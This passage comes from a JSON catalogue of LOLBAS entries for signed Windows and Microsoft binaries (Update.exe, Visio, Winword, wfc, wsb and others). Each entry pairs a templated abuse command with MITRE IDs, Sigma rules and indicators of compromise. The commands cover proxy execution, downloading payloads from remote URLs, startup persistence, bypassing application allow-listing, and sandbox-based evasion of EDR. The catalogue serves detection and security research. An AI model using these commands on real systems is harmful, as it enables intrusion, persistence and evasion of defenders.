process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:11","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --createShortcut={PATH:.exe} -l=Startup","description":"Copy your payload into \"%localappdata%\\Microsoft\\Teams\\current\\\". Then run the command. Update.exe will create a shortcut to the specified executable in \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\". Then payload will run on every login of the user who runs it.","usecase":"Execute binary","mitre":["T1547"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:12","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --removeShortcut={PATH:.exe}-l=Startup","description":"Run the command to remove the shortcut created in the \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" directory you created with the LolBinExecution \"--createShortcut\" described on this page.","usecase":"Execute binary","mitre":["T1070"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vsdiagnostics-exe:0","toolId":"lolbas:vsdiagnostics-exe","toolName":"VSDiagnostics.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSDiagnostics.exe start 1 /launch:{PATH:.exe}","description":"Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable.","usecase":"Proxy execution of binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml"}],"references":["https://twitter.com/0xBoku/status/1679200664013135872","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vsdiagnostics-exe:1","toolId":"lolbas:vsdiagnostics-exe","toolName":"VSDiagnostics.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:\"{CMD:args}\"","description":"Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.","usecase":"Proxy execution of binary with arguments","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml"}],"references":["https://twitter.com/0xBoku/status/1679200664013135872","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vsiisexelauncher-exe:0","toolId":"lolbas:vsiisexelauncher-exe","toolName":"VSIISExeLauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSIISExeLauncher.exe -p {PATH:.exe} -a \"{CMD:args}\"","description":"The above binary will execute other binary.","usecase":"Execute any binary with given arguments.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\Extensions\\Microsoft\\Web Tools\\ProjectSystem\\VSIISExeLauncher.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml"},{"type":"IOC","value":"VSIISExeLauncher.exe spawned an unknown process"}],"references":["https://github.com/timwhitez","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:visio-exe:0","toolId":"lolbas:visio-exe","toolName":"Visio.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Visio.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a visio.exe command line"},{"type":"IOC","value":"visio.exe making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Visio/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:visualuiaverifynative-exe:0","toolId":"lolbas:visualuiaverifynative-exe","toolName":"VisualUiaVerifyNative.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"VisualUiaVerifyNative.exe","description":"Generate Serialized gadget and save to - `C:\\Users\\%USERNAME%\\AppData\\Roaminguiverify.config` before executing.","usecase":"Execute proxied payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1218"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\arm64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\UIAVerify\\VisualUiaVerifyNative.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/","https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vslaunchbrowser-exe:0","toolId":"lolbas:vslaunchbrowser-exe","toolName":"VSLaunchBrowser.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"VSLaunchBrowser.exe .exe {REMOTEURL:.exe}","description":"Download and execute payload from remote server","usecase":"It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"cmd.exe as sub-process of VSLaunchBrowser"},{"type":"IOC","value":"URL on a VSLaunchBrowser command line"},{"type":"IOC","value":"VSLaunchBrowser making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vslaunchbrowser-exe:1","toolId":"lolbas:vslaunchbrowser-exe","toolName":"VSLaunchBrowser.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}","description":"Execute payload via VSLaunchBrowser as parent process","usecase":"It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"cmd.exe as sub-process of VSLaunchBrowser"},{"type":"IOC","value":"URL on a VSLaunchBrowser command line"},{"type":"IOC","value":"VSLaunchBrowser making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vslaunchbrowser-exe:2","toolId":"lolbas:vslaunchbrowser-exe","toolName":"VSLaunchBrowser.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSLaunchBrowser.exe .exe {PATH_SMB}","description":"Execute payload from WebDAV server via VSLaunchBrowser as parent process","usecase":"It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"cmd.exe as sub-process of VSLaunchBrowser"},{"type":"IOC","value":"URL on a VSLaunchBrowser command line"},{"type":"IOC","value":"VSLaunchBrowser making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vshadow-exe:0","toolId":"lolbas:vshadow-exe","toolName":"Vshadow.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:","description":"Executes specified executable from vshadow.exe.","usecase":"Performs execution of specified executable file.","mitre":["T1202"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\vshadow.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_vshadow_exec.yml"},{"type":"IOC","value":"vshadow.exe usage with -exec parameter"}],"references":["https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vsjitdebugger-exe:0","toolId":"lolbas:vsjitdebugger-exe","toolName":"vsjitdebugger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Vsjitdebugger.exe {PATH:.exe}","description":"Executes specified executable as a subprocess of Vsjitdebugger.exe.","usecase":"Execution of local PE file as a subprocess of Vsjitdebugger.exe.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\windows\\system32\\vsjitdebugger.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml"}],"references":["https://twitter.com/pabraeken/status/990758590020452353","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsjitdebugger/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wfmformat-exe:0","toolId":"lolbas:wfmformat-exe","toolName":"WFMFormat.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WFMFormat.exe","description":"Executes the file `tracerpt.exe` in the same folder as `WFMFormat.exe`. If the file `dumpfile.txt` (any content) exists in the current working directory, no arguments are required. Note that `WFMFormat.exe` requires .NET Framework 3.5.","usecase":"Proxy execution of binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\there\\is\\no\\default\\installation\\path\\WFMFormat.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Child process from WFMFormat.exe"},{"type":"IOC","value":"tracerpt.exe processes located anywhere other than c:\\windows\\system32"}],"references":["https://www.microsoft.com/en-us/download/details.aspx?id=103244","https://lolbas-project.github.io/lolbas/OtherMSBinaries/WFMFormat/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wfc-exe:0","toolId":"lolbas:wfc-exe","toolName":"Wfc.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"wfc.exe {PATH_ABSOLUTE:.xoml}","description":"Execute arbitrary C# code embedded in a XOML file.","usecase":"Execute proxied payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\wfc.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:windbg-exe:0","toolId":"lolbas:windbg-exe","toolName":"WinDbg.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"windbg.exe -g {CMD}","description":"Launches a command line through the debugging process; optionally add `-G` to exit the debugger automatically.","usecase":"Executes an executable under a trusted microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\windbg.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-command-line-options","https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinDbg/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:winproj-exe:0","toolId":"lolbas:winproj-exe","toolName":"WinProj.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"WinProj.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\WinProj.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a WinProj command line"},{"type":"IOC","value":"WinProj making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinProj/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:winword-exe:0","toolId":"lolbas:winword-exe","toolName":"Winword.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"winword.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wsb-exe:0","toolId":"lolbas:wsb-exe","toolName":"wsb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsb start --config \"<Configuration><LogonCommand><Command>{CMD}</Command></LogonCommand></Configuration>\"\nwsb exec -r System --id YOUR_ID","description":"Executes the given command in a Windows Sandbox from an inline XML configuration with an embedded `<LogonCommand>`, leaving no `.wsb` file on disk. Note: `<LogonCommand>` only fires once `WDAGUtilityAccount` actually logs in, which only happens after an RDP session is established via `wsb connect`, so this pattern opens a visible Sandbox window.","usecase":"Fileless execution of arbitrary commands in an EDR-free environment whose host-side process tree is masked by the Sandbox client binaries.","mitre":["T1564.006"],"privilege":"user","fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"wsb.exe command line containing --config with an embedded <LogonCommand> XML element"},{"type":"IOC","value":"wsb.exe command line invoking the share subcommand with --allow-write"},{"type":"IOC","value":"wsb.exe command line invoking the exec subcommand with -r System"},{"type":"IOC","value":"WindowsSandboxServer.exe spawns whenever a Sandbox session starts, regardless of whether anyone connects. Lives under %ProgramFiles%\\WindowsApps\\MicrosoftWindows.WindowsSandbox_*\\."},{"type":"IOC","value":"WindowsSandboxRemoteSession.exe spawns ONLY when an RDP connection to the Sandbox is established - opening a .wsb file directly auto-connects (so both processes appear), but `wsb start` alone does NOT spawn it. Its absence while WindowsSandboxServer.exe is alive means no user has connected."},{"type":"IOC","value":"(highest-signal for headless abuse) WindowsSandboxServer.exe present WITHOUT WindowsSandboxRemoteSession.exe indicates a Sandbox VM is running with no interactive session. Legitimate usage almost always involves an RDP connection (because users want to use the Sandbox); a server-without-remote-session state is consistent with the `wsb exec -r System` headless attack primitive."},{"type":"IOC","value":"vmwp.exe and vmmemWindowsSandbox spawned alongside wsb.exe activity indicate the Sandbox VM is up (vmwp is the Hyper-V worker hosting the Sandbox VM)"},{"type":"IOC","value":"Host-side file-creation events on paths corresponding to a mapped folder, attributed to vmwp.exe (Hyper-V worker), with timestamps inside the lifetime of an active Sandbox session - empirically verified on Windows 11 24H2 via Process Monitor; this is how a sandbox-to-host cross-boundary write surfaces from host telemetry"},{"type":"IOC","value":"Microsoft-Windows-Sandbox-Client-Diagnostics/Admin event log entries for Sandbox lifecycle events correlated with wsb.exe invocations"}],"references":["https://web.archive.org/web/20250116184008/http://blog.syscall.party/2020/12/02/weaponizing-windows-sandbox.html","https://github.com/LloydLabs/wsb-detect","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-cli","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-versions","https://github.com/secdev02/SandBoxShenanigans","https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wsb-exe:1","toolId":"lolbas:wsb-exe","toolName":"wsb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsb start --config \"<Configuration><MappedFolders><MappedFolder><HostFolder>{PATH_ABSOLUTE:folder}</HostFolder><ReadOnly>false</ReadOnly></MappedFolder></MappedFolders></Configuration>\"\nwsb exec -r System --id YOUR_ID -c \"cmd.exe /c copy C:\\users\\WDAGUtilityAccount\\Desktop\\Temp\\{PATH} {PATH}\"","description":"Allows the specified folder to be accessible from within the Windows Sandbox, mounted under `C:\\users\\WDAGUtilityAccount\\Desktop` with the same folder name as the source folder. This allows, for example, for copying payloads from the host system into the sandbox (seen here), copying payloads from the sandbox back to the host system, or for accessing arbitrary host system files by the sandbox.","usecase":"Fileless execution of arbitrary commands in an EDR-free environment, with access to files on the host system, while the host-side process tree is masked by the Sandbox client binaries.","mitre":["T1564.006"],"privilege":"user","fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"wsb.exe command line containing --config with an embedded <LogonCommand> XML element"},{"type":"IOC","value":"wsb.exe command line invoking the share subcommand with --allow-write"},{"type":"IOC","value":"wsb.exe command line invoking the exec subcommand with -r System"},{"type":"IOC","value":"WindowsSandboxServer.exe spawns whenever a Sandbox session starts, regardless of whether anyone connects. Lives under %ProgramFiles%\\WindowsApps\\MicrosoftWindows.WindowsSandbox_*\\."},{"type":"IOC","value":"WindowsSandboxRemoteSession.exe spawns ONLY when an RDP connection to the Sandbox is established - opening a .wsb file directly auto-connects (so both processes appear), but `wsb start` alone does NOT spawn it. Its absence while WindowsSandboxServer.exe is alive means no user has connected."},{"type":"IOC","value":"(highest-signal for headless abuse) WindowsSandboxServer.exe present WITHOUT WindowsSandboxRemoteSession.exe indicates a Sandbox VM is running with no interactive session. Legitimate usage almost always involves an RDP connection (because users want to use the Sandbox); a server-without-remote-session state is consistent with the `wsb exec -r System` headless attack primitive."},{"type":"IOC","value":"vmwp.exe and vmmemWindowsSandbox spawned alongside wsb.exe activity indicate the Sandbox VM is up (vmwp is the Hyper-V worker hosting the Sandbox VM)"},{"type":"IOC","value":"Host-side file-creation events on paths corresponding to a mapped folder, attributed to vmwp.exe (Hyper-V worker), with timestamps inside the lifetime of an active Sandbox session - empirically verified on Windows 11 24H2 via Process Monitor; this is how a sandbox-to-host cross-boundary write surfaces from host telemetry"},{"type":"IOC","value":"Microsoft-Windows-Sandbox-Client-Diagnostics/Admin event log entries for Sandbox lifecycle events correlated with wsb.exe invocations"}],"references":["https://web.archive.org/web/20250116184008/http://blog.syscall.party/2020/12/02/weaponizing-windows-sandbox.html","https://github.com/LloydLabs/wsb-detect","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-cli","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-versions","https://github.com/secdev02/SandBoxShenanigans","https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wsb-exe:2","toolId":"lolbas:wsb-exe","toolName":"wsb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsb start\nwsb share --id YOUR_ID -f {PATH_ABSOLUTE:folder} -s c:\\SOME_FOLDER --allow-write\nwsb exec -r System --id YOUR_ID -c \"cmd.exe /c copy {PATH_ABSOLUTE} c:\\SOME_FOLDER\"","description":"Allows the specified folder to be accessible from within the Windows Sandbox, mounted at `c:\\SOME_FOLDER`. This allows, for example, for copying payloads from the host system into the 